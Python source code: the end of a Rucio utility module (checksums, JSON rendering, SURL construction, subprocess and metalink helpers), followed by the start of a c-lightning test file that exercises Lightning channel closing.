# backflip on 32bit
if adler < 0:
adler = adler + 2 ** 32
return str('%08x' % adler)
CHECKSUM_ALGO_DICT['adler32'] = adler32
def md5(file):
"""
Runs the MD5 algorithm (RFC-1321) on the binary content of the file named file and returns the hexadecimal digest
:param file: file name
:returns: string of 32 hexadecimal digits
"""
hash_md5 = hashlib.md5()
try:
with open(file, "rb") as f:
list(map(hash_md5.update, iter(lambda: f.read(4096), b"")))
except Exception as e:
raise Exception('FATAL - could not get MD5 checksum of file %s - %s' % (file, e))
return hash_md5.hexdigest()
CHECKSUM_ALGO_DICT['md5'] = md5
def sha256(file):
"""
Runs the SHA256 algorithm on the binary content of the file named file and returns the hexadecimal digest
:param file: file name
:returns: string of 64 hexadecimal digits
"""
with open(file, "rb") as f:
bytes = f.read() # read entire file as bytes
readable_hash = hashlib.sha256(bytes).hexdigest()
print(readable_hash)
return readable_hash
CHECKSUM_ALGO_DICT['sha256'] = sha256
def crc32(file):
"""
Runs the CRC32 algorithm on the binary content of the file named file and returns the hexadecimal digest
:param file: file name
:returns: hexadecimal digest as a string (up to 8 hexadecimal digits)
"""
prev = 0
for eachLine in open(file, "rb"):
prev = zlib.crc32(eachLine, prev)
return "%X" % (prev & 0xFFFFFFFF)
CHECKSUM_ALGO_DICT['crc32'] = crc32
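# Illustrative dispatch (not part of the original module; the file path is hypothetical):
#   algo = CHECKSUM_ALGO_DICT[PREFERRED_CHECKSUM]   # 'adler32' by default
#   digest = algo('/path/to/local/file')            # hex digest string, e.g. '09f80789'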
def str_to_date(string):
""" Converts a RFC-1123 string to the corresponding datetime value.
:param string: the RFC-1123 string to convert to datetime value.
"""
return datetime.datetime.strptime(string, DATE_FORMAT) if string else None
def val_to_space_sep_str(vallist):
""" Converts a list of values into a string of space separated values
:param vallist: the list of values to convert into a string
:return: the string of space separated values or the value initially passed as parameter
"""
try:
if isinstance(vallist, list):
return u" ".join(vallist)
else:
return unicode(vallist)
except:
return u''
def date_to_str(date):
""" Converts a datetime value to the corresponding RFC-1123 string.
:param date: the datetime value to convert.
"""
return datetime.datetime.strftime(date, DATE_FORMAT) if date else None
class APIEncoder(json.JSONEncoder):
""" Propretary JSONEconder subclass used by the json render function.
This is needed to address the encoding of special values.
"""
def default(self, obj): # pylint: disable=E0202
if isinstance(obj, datetime.datetime):
# convert any datetime to RFC 1123 format
return date_to_str(obj)
elif isinstance(obj, (datetime.time, datetime.date)):
# should not happen since the only date-like format
# supported at the domain schema level is 'datetime'.
return obj.isoformat()
elif isinstance(obj, datetime.timedelta):
return obj.days * 24 * 60 * 60 + obj.seconds
elif isinstance(obj, EnumSymbol):
return obj.description
elif isinstance(obj, (InternalAccount, InternalScope)):
return obj.external
return json.JSONEncoder.default(self, obj)
def render_json(**data):
""" JSON render function
"""
return json.dumps(data, cls=APIEncoder)
def render_json_list(l):
""" JSON render function for list
"""
return json.dumps(l, cls=APIEncoder)
def datetime_parser(dct):
""" datetime parser
"""
for k, v in list(dct.items()):
if isinstance(v, string_types) and re.search(" UTC", v):
try:
dct[k] = datetime.datetime.strptime(v, DATE_FORMAT)
except Exception:
pass
return dct
def parse_response(data):
"""
JSON render function
"""
ret_obj = None
try:
ret_obj = data.decode('utf-8')
except AttributeError:
ret_obj = data
return json.loads(ret_obj, object_hook=datetime_parser)
def generate_http_error(status_code, exc_cls, exc_msg):
"""
Utility function to generate a complete HTTP error response.
:param status_code: The HTTP status code to generate a response for.
:param exc_cls: The name of the exception class to send with the response.
:param exc_msg: The error message.
:returns: a web.py HTTP response object.
"""
status = codes[status_code]
data = {'ExceptionClass': exc_cls,
'ExceptionMessage': exc_msg}
# Truncate too long exc_msg
if len(str(exc_msg)) > 15000:
exc_msg = str(exc_msg)[:15000]
headers = {'Content-Type': 'application/octet-stream',
'ExceptionClass': exc_cls,
'ExceptionMessage': clean_headers(exc_msg)}
try:
return HTTPError(status, headers=headers, data=render_json(**data))
except Exception:
print({'Content-Type': 'application/octet-stream', 'ExceptionClass': exc_cls, 'ExceptionMessage': str(exc_msg).strip()})
raise
def generate_http_error_flask(status_code, exc_cls, exc_msg):
"""
Utility function to generate a complete HTTP error response.
:param status_code: The HTTP status code to generate a response for.
:param exc_cls: The name of the exception class to send with the response.
:param exc_msg: The error message.
:returns: a Flask HTTP response object.
"""
data = {'ExceptionClass': exc_cls,
'ExceptionMessage': exc_msg}
# Truncate too long exc_msg
if len(str(exc_msg)) > 15000:
exc_msg = str(exc_msg)[:15000]
resp = Response(response=render_json(**data), status=status_code, content_type='application/octet-stream')
resp.headers['ExceptionClass'] = exc_cls
resp.headers['ExceptionMessage'] = clean_headers(exc_msg)
try:
return resp
except Exception:
print({'Content-Type': 'application/octet-stream', 'ExceptionClass': exc_cls, 'ExceptionMessage': str(exc_msg).strip()})
raise
def execute(cmd, blocking=True):
"""
Executes a command in a subprocess. Returns a tuple
of (exitcode, out, err), where out is the string output
from stdout and err is the string output from stderr when
executing the command.
:param cmd: Command string to execute
"""
process = subprocess.Popen(cmd,
shell=True,
stdin=subprocess.PIPE,
stdout=subprocess.PIPE,
stderr=subprocess.PIPE)
out = ''
err = ''
exitcode = 0
if blocking:
result = process.communicate()
(out, err) = result
exitcode = process.returncode
return exitcode, out, err
return process
def rse_supported_protocol_operations():
""" Returns a list with operations supported by all RSE protocols."""
return ['read', 'write', 'delete', 'third_party_copy']
def rse_supported_protocol_domains():
""" Returns a list with all supoorted RSE protocol domains."""
return ['lan', 'wan']
def grouper(iterable, n, fillvalue=None):
""" Collect data into fixed-length chunks or blocks """
# grouper('ABCDEFG', 3, 'x') --> ABC DEF Gxx
args = [iter(iterable)] * n
return izip_longest(*args, fillvalue=fillvalue)
def chunks(l, n):
"""
Yield successive n-sized chunks from l.
"""
for i in range(0, len(l), n):
yield l[i:i + n]
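# Illustrative example (not part of the original module):
#   list(chunks([1, 2, 3, 4, 5], 2)) --> [[1, 2], [3, 4], [5]]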
def my_key_generator(namespace, fn, **kw):
"""
Customized key generator for dogpile
"""
fname = fn.__name__
def generate_key(*arg, **kw):
return namespace + "_" + fname + "_".join(str(s) for s in filter(None, arg))
return generate_key
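# Illustrative example (not part of the original module; names are hypothetical):
# with namespace='cache' and a wrapped function named get_rse, the generated key
# function called as generate_key('MOCK', 1) produces 'cache_get_rseMOCK_1'
# (namespace and function name are joined to the first argument without an extra separator).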
def get_logger(name):
logger = getLogger(name)
hdlr = RotatingFileHandler('%s/%s.log' % (config_get('common', 'logdir'), name), maxBytes=1000000000, backupCount=10)
formatter = Formatter('%(asctime)s\t%(process)d\t%(levelname)s\t%(message)s')
hdlr.setFormatter(formatter)
logger.addHandler(hdlr)
logger.setLevel(config_get('common', 'loglevel').upper())
return logger
def construct_surl_DQ2(dsn, filename):
"""
Defines relative SURL for new replicas. This method
contains DQ2 convention. To be used for non-deterministic sites.
Method imported from DQ2.
@return: relative SURL for new replica.
@rtype: str
"""
# check how many dots in dsn
fields = dsn.split('.')
nfields = len(fields)
if nfields == 0:
return '/other/other/%s' % (filename)
elif nfields == 1:
stripped_dsn = __strip_dsn(dsn)
return '/other/%s/%s' % (stripped_dsn, filename)
elif nfields == 2:
project = fields[0]
stripped_dsn = __strip_dsn(dsn)
return '/%s/%s/%s' % (project, stripped_dsn, filename)
elif nfields < 5 or re.match('user*|group*', fields[0]):
project = fields[0]
f2 = fields[1]
f3 = fields[2]
stripped_dsn = __strip_dsn(dsn)
return '/%s/%s/%s/%s/%s' % (project, f2, f3, stripped_dsn, filename)
else:
project = fields[0]
dataset_type = fields[4]
if nfields == 5:
tag = 'other'
else:
tag = __strip_tag(fields[-1])
stripped_dsn = __strip_dsn(dsn)
return '/%s/%s/%s/%s/%s' % (project, dataset_type, tag, stripped_dsn, filename)
def construct_surl_T0(dsn, filename):
"""
Defines relative SURL for new replicas. This method
contains Tier0 convention. To be used for non-deterministic sites.
@return: relative SURL for new replica.
@rtype: str
"""
fields = dsn.split('.')
nfields = len(fields)
if nfields >= 3:
return '/%s/%s/%s/%s/%s' % (fields[0], fields[2], fields[1], dsn, filename)
elif nfields == 1:
return '/%s/%s/%s/%s/%s' % (fields[0], 'other', 'other', dsn, filename)
elif nfields == 2:
# only two fields are available, so use the second one and pad with 'other'
return '/%s/%s/%s/%s/%s' % (fields[0], fields[1], 'other', dsn, filename)
elif nfields == 0:
return '/other/other/other/other/%s' % (filename)
def construct_surl_BelleII(dsn, filename):
"""
Defines relative SURL for Belle II specific replicas.
This method contains the Belle II convention.
To be used for non-deterministic Belle II sites.
DSN (or datablock in the Belle II naming) contains /
"""
fields = dsn.split("/")
nfields = len(fields)
if nfields == 0:
return '/other/%s' % (filename)
else:
return '%s/%s' % (dsn, filename)
_SURL_ALGORITHMS = {}
_DEFAULT_SURL = 'DQ2'
def register_surl_algorithm(surl_callable, name=None):
if name is None:
name = surl_callable.__name__
_SURL_ALGORITHMS[name] = surl_callable
register_surl_algorithm(construct_surl_T0, 'T0')
register_surl_algorithm(construct_surl_DQ2, 'DQ2')
register_surl_algorithm(construct_surl_BelleII, 'BelleII')
def construct_surl(dsn, filename, naming_convention=None):
# ensure that policy package is loaded in case it registers its own algorithms
import rucio.common.schema # noqa: F401
if naming_convention is None or naming_convention not in _SURL_ALGORITHMS:
naming_convention = _DEFAULT_SURL
return _SURL_ALGORITHMS[naming_convention](dsn, filename)
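# Illustrative dispatch (not part of the original module):
#   construct_surl('/belle/mc/release', 'file.root', 'BelleII')
#   --> '/belle/mc/release/file.root'
# An unknown or missing naming_convention falls back to the 'DQ2' algorithm.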
def __strip_dsn(dsn):
"""
Drop the _sub and _dis suffixes for panda datasets from the lfc path
they will be registered in.
Method imported from DQ2.
"""
suffixes_to_drop = ['_dis', '_sub', '_frag']
fields = dsn.split('.')
last_field = fields[-1]
try:
for suffix in suffixes_to_drop:
last_field = re.sub('%s.*$' % suffix, '', last_field)
except IndexError:
return dsn
fields[-1] = last_field
stripped_dsn = '.'.join(fields)
return stripped_dsn
def __strip_tag(tag):
"""
Drop the _sub and _dis suffixes for panda datasets from the lfc path
they will be registered in
Method imported from DQ2.
"""
suffixes_to_drop = ['_dis', '_sub', '_tid']
stripped_tag = tag
try:
for suffix in suffixes_to_drop:
stripped_tag = re.sub('%s.*$' % suffix, '', stripped_tag)
except IndexError:
return stripped_tag
return stripped_tag
def clean_surls(surls):
res = []
for surl in surls:
if surl.startswith('srm'):
surl = re.sub(':[0-9]+/', '/', surl)
surl = re.sub(r'/srm/managerv1\?SFN=', '', surl)
surl = re.sub(r'/srm/v2/server\?SFN=', '', surl)
surl = re.sub(r'/srm/managerv2\?SFN=', '', surl)
res.append(surl)
res.sort()
return res
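# Illustrative example (not part of the original module; the endpoint is hypothetical):
#   clean_surls(['srm://se.example.org:8443/srm/managerv2?SFN=/pnfs/example.org/data/f1'])
#   --> ['srm://se.example.org/pnfs/example.org/data/f1']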
def pid_exists(pid):
"""
Check whether pid exists in the current process table.
UNIX only.
"""
if pid < 0:
return False
if pid == 0:
# According to "man 2 kill" PID 0 refers to every process
# in the process group of the calling process.
# On certain systems 0 is a valid PID but we have no way
# to know that in a portable fashion.
raise ValueError('invalid PID 0')
try:
os.kill(pid, 0)
except OSError as err:
if err.errno == errno.ESRCH:
# ESRCH == No such process
return False
elif err.errno == errno.EPERM:
# EPERM clearly means there's a process to deny access to
return True
else:
# According to "man 2 kill" possible error values are
# (EINVAL, EPERM, ESRCH)
raise
else:
return True
def sizefmt(num, human=True):
"""
Print human readable file sizes
"""
if num is None:
return '0.0 B'
try:
num = int(num)
if human:
for unit in ['', 'k', 'M', 'G', 'T', 'P', 'E', 'Z']:
if abs(num) < 1000.0:
return "%3.3f %sB" % (num, unit)
num /= 1000.0
return "%.1f %sB" % (num, 'Y')
else:
return str(num)
except OverflowError:
return 'Inf'
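# Illustrative examples (not part of the original module):
#   sizefmt(1234567)              --> '1.235 MB'
#   sizefmt(512)                  --> '512.000 B'
#   sizefmt(1234567, human=False) --> '1234567'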
def get_tmp_dir():
"""
Get a path where to store temporary files.
Rucio relies on tempfile.gettempdir(), which searches a standard list of
temporary directories in this order:
The directory named by the TMPDIR environment variable.
The directory named by the TEMP environment variable.
The directory named by the TMP environment variable.
As a last resort, platform-specific defaults such as the /tmp directory.
:return: A path.
"""
base_dir = os.path.abspath(tempfile.gettempdir())
try:
return os.path.join(base_dir, getpass.getuser())
except Exception:
pass
try:
return os.path.join(base_dir, str(os.getuid()))
except Exception:
pass
return base_dir
def is_archive(name):
'''
Check if a file name is an archive file or not.
:return: A boolean.
'''
regexp = r'^.*\.(zip|zipx|tar.gz|tgz|tar.Z|tar.bz2|tbz2)(\.\d+)*$'
if re.match(regexp, name, re.I):
return True
return False
class Color:
PURPLE = '\033[95m'
CYAN = '\033[96m'
DARKCYAN = '\033[36m'
BLUE = '\033[94m'
GREEN = '\033[92m'
YELLOW = '\033[93m'
RED = '\033[91m'
BOLD = '\033[1m'
UNDERLINE = '\033[4m'
END = '\033[0m'
def detect_client_location():
"""
Open a UDP socket to a machine on the internet, to get the local IPv4 and IPv6
addresses of the requesting client.
Try to determine the sitename automatically from common environment variables,
in this order: SITE_NAME, ATLAS_SITE_NAME, OSG_SITE_NAME. If none of these exist
use the fixed string 'ROAMING'.
"""
ip = '0.0.0.0'
try:
s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
s.connect(("8.8.8.8", 80))
ip = s.getsockname()[0]
except Exception:
pass
ip6 = '::'
try:
s = socket.socket(socket.AF_INET6, socket.SOCK_DGRAM)
s.connect(("2001:4860:4860:0:0:0:0:8888", 80))
ip6 = s.getsockname()[0]
except Exception:
pass
site = os.environ.get('SITE_NAME',
os.environ.get('ATLAS_SITE_NAME',
os.environ.get('OSG_SITE_NAME',
'ROAMING')))
return {'ip': ip,
'ip6': ip6,
'fqdn': socket.getfqdn(),
'site': site}
def ssh_sign(private_key, message):
"""
Sign a string message using the private key.
:param private_key: The SSH RSA private key as a string.
:param message: The message to sign as a string.
:return: Base64 encoded signature as a string.
"""
if PY3 and isinstance(message, str):
message = message.encode()
if not EXTRA_MODULES['paramiko']:
raise MissingModuleException('The paramiko module is not installed or faulty.')
sio_private_key = StringIO(private_key)
priv_k = RSAKey.from_private_key(sio_private_key)
sio_private_key.close()
signature_stream = priv_k.sign_ssh_data(message)
signature_stream.rewind()
base64_encoded = base64.b64encode(signature_stream.get_remainder())
if PY3:
base64_encoded = base64_encoded.decode()
return base64_encoded
def make_valid_did(lfn_dict):
"""
When managing information about a LFN (such as in `rucio upload` or
the RSE manager's upload), we add the `filename` attribute to record
the name of the file on the local disk in addition to the remainder
of the DID information.
This function will take that python dictionary, and strip out the
additional `filename` key. If this is not done, then the dictionary
will not pass the DID JSON schema validation.
"""
lfn_copy = dict(lfn_dict)
lfn_copy['name'] = lfn_copy.get('name', lfn_copy['filename'])
del lfn_copy['filename']
return lfn_copy
def send_trace(trace, trace_endpoint, user_agent, retries=5):
"""
Send the given trace to the trace endpoint
:param trace: the trace dictionary to send
:param trace_endpoint: the endpoint where the trace should be sent
:param user_agent: the user agent sending the trace
:param retries: the number of retries if sending fails
:return: 0 on success, 1 on failure
"""
if user_agent.startswith('pilot'):
return 0
for dummy in range(retries):
try:
requests.post(trace_endpoint + '/traces/', verify=False, data=json.dumps(trace))
return 0
except Exception:
pass
return 1
def add_url_query(url, query):
"""
Add a new dictionary to URL parameters
:param url: The existing URL
:param query: A dictionary containing key/value pairs to be added to the URL
:return: The expanded URL with the new query parameters
"""
url_parts = list(urlparse.urlparse(url))
mod_query = dict(urlparse.parse_qsl(url_parts[4]))
mod_query.update(query)
url_parts[4] = urlencode(mod_query)
return urlparse.urlunparse(url_parts)
def get_bytes_value_from_string(input_string):
"""
Get bytes from a string that represents a storage value and unit
:param input_string: String containing a value and a unit
:return: Integer value representing the value in bytes
"""
result = re.findall('^([0-9]+)([A-Za-z]+)$', input_string)
if result:
value = int(result[0][0])
unit = result[0][1].lower()
if unit == 'b':
value = value
elif unit == 'kb':
value = value * 1000
elif unit == 'mb':
value = value * 1000000
elif unit == 'gb':
value = value * 1000000000
elif unit == 'tb':
value = value * 1000000000000
elif unit == 'pb':
value = value * 1000000000000000
else:
return False
return value
else:
return False
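# Illustrative examples (not part of the original module):
#   get_bytes_value_from_string('10MB')  --> 10000000
#   get_bytes_value_from_string('2kb')   --> 2000
#   get_bytes_value_from_string('10 MB') --> False   (whitespace does not match the pattern)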
def parse_did_filter_from_string(input_string):
"""
Parse DID filter options in format 'length<3,type=all' from string.
:param input_string: String containing the filter options.
:return: filter dictionary and type as string.
"""
filters = {}
type = 'collection'
if input_string:
filter_options = input_string.replace(' ', '').split(',')
for option in filter_options:
value = None
key = None
if '>=' in option:
key, value = option.split('>=')
if key == 'length':
key = 'length.gte'
elif '>' in option:
key, value = option.split('>')
if key == 'length':
key = 'length.gt'
elif '<=' in option:
key, value = option.split('<=')
if key == 'length':
key = 'length.lte'
elif '<' in option:
key, value = option.split('<')
if key == 'length':
key = 'length.lt'
elif '=' in option:
key, value = option.split('=')
if key == 'created_after' or key == 'created_before':
value = datetime.datetime.strptime(value, '%Y-%m-%dT%H:%M:%S.%fZ')
if key == 'type':
if value.upper() in ['ALL', 'COLLECTION', 'CONTAINER', 'DATASET', 'FILE']:
type = value.lower()
else:
raise InvalidType('{0} is not a valid type. Valid types are {1}'.format(value, ['ALL', 'COLLECTION', 'CONTAINER', 'DATASET', 'FILE']))
elif key in ('length.gt', 'length.lt', 'length.gte', 'length.lte', 'length'):
try:
value = int(value)
filters[key] = value
except ValueError:
raise ValueError('Length has to be an integer value.')
filters[key] = value
elif isinstance(value, string_types):
if value.lower() == 'true':
value = '1'
elif value.lower() == 'false':
value = '0'
filters[key] = value
else:
filters[key] = value
return filters, type
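# Illustrative example (not part of the original module):
#   parse_did_filter_from_string('length<3,type=all')
#   --> ({'length.lt': 3}, 'all')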
def parse_replicas_from_file(path):
"""
Parses the output of list_replicas from a json or metalink file
into a dictionary. Metalink parsing is tried first and if it fails
it tries to parse json.
:param path: the path to the input file
:returns: a list with a dictionary for each file
"""
with open(path) as fp:
try:
root = ElementTree.parse(fp).getroot()
return parse_replicas_metalink(root)
except ElementTree.ParseError as xml_err:
try:
return json.load(fp)
except ValueError as json_err:
raise MetalinkJsonParsingError(path, xml_err, json_err)
def parse_replicas_from_string(string):
"""
Parses the output of list_replicas from a json or metalink string
into a dictionary. Metalink parsing is tried first and if it fails
it tries to parse json.
:param string: the string to parse
:returns: a list with a dictionary for each file
"""
try:
root = ElementTree.fromstring(string)
return parse_replicas_metalink(root)
except ElementTree.ParseError as xml_err:
try:
return json.loads(string)
except ValueError as json_err:
raise MetalinkJsonParsingError(string, xml_err, json_err)
def parse_replicas_metalink(root):
"""
Transforms the metalink tree into a list of dictionaries where
each dictionary describes a file with its replicas.
Will be called by parse_replicas_from_file and parse_replicas_from_string.
:param root: root node of the metalink tree
:returns: a list with a dictionary for each file
"""
files = []
# metalink namespace
ns = '{urn:ietf:params:xml:ns:metalink}'
str_to_bool = {'true': True, 'True': True, 'false': False, 'False': False}
# loop over all <file> tags of the metalink string
for file_tag_obj in root.findall(ns + 'file'):
# search for identity-tag
identity_tag_obj = file_tag_obj.find(ns + 'identity')
if not ElementTree.iselement(identity_tag_obj):
raise InputValidationError('Failed to locate identity-tag inside %s' % ElementTree.tostring(file_tag_obj))
cur_file = {'did': identity_tag_obj.text,
'adler32': None,
'md5': None,
'sources': []}
parent_dids = set()
parent_dids_tag_obj = file_tag_obj.find(ns + 'parents')
if ElementTree.iselement(parent_dids_tag_obj):
for did_tag_obj in parent_dids_tag_obj.findall(ns + 'did'):
parent_dids.add(did_tag_obj.text)
cur_file['parent_dids'] = parent_dids
size_tag_obj = file_tag_obj.find(ns + 'size')
cur_file['bytes'] = int(size_tag_obj.text) if ElementTree.iselement(size_tag_obj) else None
for hash_tag_obj in file_tag_obj.findall(ns + 'hash'):
hash_type = hash_tag_obj.get('type')
if hash_type:
cur_file[hash_type] = hash_tag_obj.text
for url_tag_obj in file_tag_obj.findall(ns + 'url'):
key_rename_map = {'location': 'rse'}
src = {}
for k, v in url_tag_obj.items():
k = key_rename_map.get(k, k)
src[k] = str_to_bool.get(v, v)
src['pfn'] = url_tag_obj.text
cur_file['sources'].append(src)
files.append(cur_file)
return files
def get_thread_with_periodic_running_function(interval, action, graceful_stop):
"""
Get a thread where a function runs periodically.
:param interval: Interval in seconds at which the action function should run.
:param action: Function, that should run periodically.
:param graceful_stop: Threading event used to check for graceful stop.
"""
def start():
while not graceful_stop.is_set():
starttime = time.time()
action()
time.sleep(max(0, interval - (time.time() - starttime)))  # never pass a negative value to sleep
t = threading.Thread(target=start)
return t
def run_cmd_process(cmd, timeout=3600):
"""
shell command parser with timeout
:param cmd: shell command as a string
:param timeout: in seconds
:return: stdout xor stderr, and errorcode
"""
time_start = time.time()  # wall-clock reference; datetime's .second would wrap every minute
process = subprocess.Popen(cmd, stdout=subprocess.PIPE, stderr=subprocess.PIPE, shell=True, preexec_fn=os.setsid)
running_time = 0
while process.poll() is None and running_time < timeout:
running_time = int(time.time() - time_start)
time.sleep(3)
if process.poll() is None:
process.terminate()
time.sleep(3)
if process.poll() is None:
process.kill()
stdout, stderr = process.communicate()
if not stderr:
stderr = ''
if not stdout:
stdout = ''
if stderr and stderr != '':
stdout += " Error: " + stderr
if process:
returncode = process.returncode
else:
returncode = 1
if returncode != 1 and 'Command time-out' in stdout:
returncode = 1
if returncode is None:
returncode = 0
return returncode, stdout
def api_update_return_dict(dictionary):
"""
Ensure that rse is in a dictionary returned from core
:param dictionary: The dictionary to edit
:returns dictionary: The edited dictionary
"""
if not isinstance(dictionary, dict):
return dictionary
copied = False # Avoid side effects from pass by object
if 'rse_id' in dictionary.keys():
if 'rse' not in dictionary.keys():
if not copied:
dictionary = dictionary.copy()
copied = True
import rucio.core.rse
dictionary['rse'] = rucio.core.rse.get_rse_name(rse_id=dictionary['rse_id'])
if 'account' in dictionary.keys():
if not copied:
dictionary = dictionary.copy()
copied = True
dictionary['account'] = dictionary['account'].external
if 'scope' in dictionary.keys():
if not copied:
dictionary = dictionary.copy()
copied = True
dictionary['scope'] = dictionary['scope'].external
return dictionary
def get_parsed_throttler_mode(throttler_mode):
""" Parse the conveyor-throttler mode string. """
direction = None
all_activities = None
if throttler_mode == 'DEST_PER_ACT':
direction = 'destination'
all_activities = False
elif throttler_mode == 'DEST_PER_ALL_ACT':
direction = 'destination'
all_activities = True
elif throttler_mode == 'SRC_PER_ACT':
direction = 'source'
all_activities = False
elif throttler_mode == 'SRC_PER_ALL_ACT':
direction = 'source'
all_activities = True
return (direction, all_activities)
def query_bunches(query, bunch_by):
"""
Queries output by yield_per sqlalchemy function
(which in a for loop returns rows one by one).
Groups the query rows in bunches of bunch_by
elements and returns list of bunches.
:param query: sqlalchemy session query
:param bunch_by: integer number
:returns: [[bunch_of_tuples_1],[bunch_of_tuples_2],...]
"""
filtered_bunches = []
item_bunch = []
for i in query.yield_per(bunch_by):
# i is either tuple of one element (token/model object etc.)
if not isinstance(i, tuple) and not isinstance(i, list):
item_bunch.append(i)
# or i is a tuple with the column elements per row
else:
item_bunch += i
if len(item_bunch) % bunch_by == 0:
filtered_bunches.append(item_bunch)
item_bunch = []
if item_bunch:
filtered_bunches.append(item_bunch)
return filtered_bunches
|
test_closing.py
|
from fixtures import * # noqa: F401,F403
from flaky import flaky
from pyln.client import RpcError
from utils import (
only_one, sync_blockheight, wait_for, DEVELOPER, TIMEOUT, VALGRIND,
SLOW_MACHINE, COMPAT
)
import os
import queue
import pytest
import re
import threading
import unittest
@unittest.skipIf(not DEVELOPER, "Too slow without --dev-bitcoind-poll")
def test_closing(node_factory, bitcoind, chainparams):
l1, l2 = node_factory.line_graph(2)
chan = l1.get_channel_scid(l2)
fee = 5430 if not chainparams['elements'] else 8955
l1.pay(l2, 200000000)
assert bitcoind.rpc.getmempoolinfo()['size'] == 0
billboard = only_one(l1.rpc.listpeers(l2.info['id'])['peers'][0]['channels'])['status']
assert billboard == ['CHANNELD_NORMAL:Funding transaction locked.']
billboard = only_one(l2.rpc.listpeers(l1.info['id'])['peers'][0]['channels'])['status']
assert billboard == ['CHANNELD_NORMAL:Funding transaction locked.']
bitcoind.generate_block(5)
# Only wait for the channels to activate with DEVELOPER=1,
# otherwise it's going to take too long because of the missing
# --dev-fast-gossip
if DEVELOPER:
wait_for(lambda: len(l1.getactivechannels()) == 2)
wait_for(lambda: len(l2.getactivechannels()) == 2)
billboard = only_one(l1.rpc.listpeers(l2.info['id'])['peers'][0]['channels'])['status']
# This may either be from a local_update or an announce, so just
# check for the substring
assert 'CHANNELD_NORMAL:Funding transaction locked.' in billboard[0]
l1.rpc.close(chan)
l1.daemon.wait_for_log(' to CHANNELD_SHUTTING_DOWN')
l2.daemon.wait_for_log(' to CHANNELD_SHUTTING_DOWN')
l1.daemon.wait_for_log(' to CLOSINGD_SIGEXCHANGE')
l2.daemon.wait_for_log(' to CLOSINGD_SIGEXCHANGE')
# And should put closing into mempool.
l1.daemon.wait_for_log('sendrawtx exit 0')
l2.daemon.wait_for_log('sendrawtx exit 0')
# Both nodes should have disabled the channel in their view
wait_for(lambda: len(l1.getactivechannels()) == 0)
wait_for(lambda: len(l2.getactivechannels()) == 0)
assert bitcoind.rpc.getmempoolinfo()['size'] == 1
# Now grab the close transaction
closetxid = only_one(bitcoind.rpc.getrawmempool(False))
billboard = only_one(l1.rpc.listpeers(l2.info['id'])['peers'][0]['channels'])['status']
assert billboard == [
'CLOSINGD_SIGEXCHANGE:We agreed on a closing fee of {} satoshi for tx:{}'.format(fee, closetxid),
]
bitcoind.generate_block(1)
l1.daemon.wait_for_log(r'Owning output.* \(SEGWIT\).* txid %s.* CONFIRMED' % closetxid)
l2.daemon.wait_for_log(r'Owning output.* \(SEGWIT\).* txid %s.* CONFIRMED' % closetxid)
# Make sure both nodes have grabbed their close tx funds
assert closetxid in set([o['txid'] for o in l1.rpc.listfunds()['outputs']])
assert closetxid in set([o['txid'] for o in l2.rpc.listfunds()['outputs']])
wait_for(lambda: only_one(l1.rpc.listpeers(l2.info['id'])['peers'][0]['channels'])['status'] == [
'CLOSINGD_SIGEXCHANGE:We agreed on a closing fee of {} satoshi for tx:{}'.format(fee, closetxid),
'ONCHAIN:Tracking mutual close transaction',
'ONCHAIN:All outputs resolved: waiting 99 more blocks before forgetting channel'
])
bitcoind.generate_block(9)
wait_for(lambda: only_one(l1.rpc.listpeers(l2.info['id'])['peers'][0]['channels'])['status'] == [
'CLOSINGD_SIGEXCHANGE:We agreed on a closing fee of {} satoshi for tx:{}'.format(fee, closetxid),
'ONCHAIN:Tracking mutual close transaction',
'ONCHAIN:All outputs resolved: waiting 90 more blocks before forgetting channel'
])
# Make sure both have forgotten about it
bitcoind.generate_block(90)
wait_for(lambda: len(l1.rpc.listchannels()['channels']) == 0)
wait_for(lambda: len(l2.rpc.listchannels()['channels']) == 0)
# The entry in the channels table should still be there
assert l1.db_query("SELECT count(*) as c FROM channels;")[0]['c'] == 1
assert l2.db_query("SELECT count(*) as c FROM channels;")[0]['c'] == 1
def test_closing_while_disconnected(node_factory, bitcoind, executor):
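    # A mutual close initiated while the peer is offline should complete once
    # the peer restarts and reconnects; the channel then disappears from
    # listchannels after enough confirmations.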
l1, l2 = node_factory.line_graph(2, opts={'may_reconnect': True})
chan = l1.get_channel_scid(l2)
l1.pay(l2, 200000000)
l2.stop()
# The close should still be triggered afterwards.
fut = executor.submit(l1.rpc.close, chan, 0)
l1.daemon.wait_for_log(' to CHANNELD_SHUTTING_DOWN')
l2.start()
fut.result(TIMEOUT)
l1.daemon.wait_for_log(' to CLOSINGD_SIGEXCHANGE')
l2.daemon.wait_for_log(' to CLOSINGD_SIGEXCHANGE')
# And should put closing into mempool.
l1.daemon.wait_for_log('sendrawtx exit 0')
l2.daemon.wait_for_log('sendrawtx exit 0')
bitcoind.generate_block(101)
wait_for(lambda: len(l1.rpc.listchannels()['channels']) == 0)
wait_for(lambda: len(l2.rpc.listchannels()['channels']) == 0)
def test_closing_id(node_factory):
"""Test closing using peer ID and full channel ID
"""
l1, l2 = node_factory.get_nodes(2)
# Close by full channel ID.
l1.rpc.connect(l2.info['id'], 'localhost', l2.port)
l1.fund_channel(l2, 10**6)
cid = l2.rpc.listpeers()['peers'][0]['channels'][0]['channel_id']
l2.rpc.close(cid)
wait_for(lambda: not only_one(l1.rpc.listpeers(l2.info['id'])['peers'])['connected'])
wait_for(lambda: not only_one(l2.rpc.listpeers(l1.info['id'])['peers'])['connected'])
# Close by peer ID.
l2.rpc.connect(l1.info['id'], 'localhost', l1.port)
l1.daemon.wait_for_log("Handed peer, entering loop")
l2.fund_channel(l1, 10**6)
pid = l1.info['id']
l2.rpc.close(pid)
wait_for(lambda: not only_one(l1.rpc.listpeers(l2.info['id'])['peers'])['connected'])
wait_for(lambda: not only_one(l2.rpc.listpeers(l1.info['id'])['peers'])['connected'])
@unittest.skipIf(VALGRIND, "Flaky under valgrind")
def test_closing_torture(node_factory, executor, bitcoind):
# We set up a fully-connected mesh of N nodes, then try
# closing them all at once.
amount = 10**6
num_nodes = 10 # => 45 channels (36 seconds on my laptop)
if VALGRIND:
num_nodes -= 4 # => 15 (135 seconds)
if SLOW_MACHINE:
num_nodes -= 1 # => 36/10 (37/95 seconds)
nodes = node_factory.get_nodes(num_nodes)
# Make sure bitcoind has plenty of utxos
bitcoind.generate_block(num_nodes)
# Give them all plenty of UTXOs, make sure they see them
for i in range(len(nodes)):
for j in range(i + 1, len(nodes)):
addr = nodes[i].rpc.newaddr()['bech32']
bitcoind.rpc.sendtoaddress(addr, (amount + 1000000) / 10**8)
bitcoind.generate_block(1)
sync_blockheight(bitcoind, nodes)
txs = []
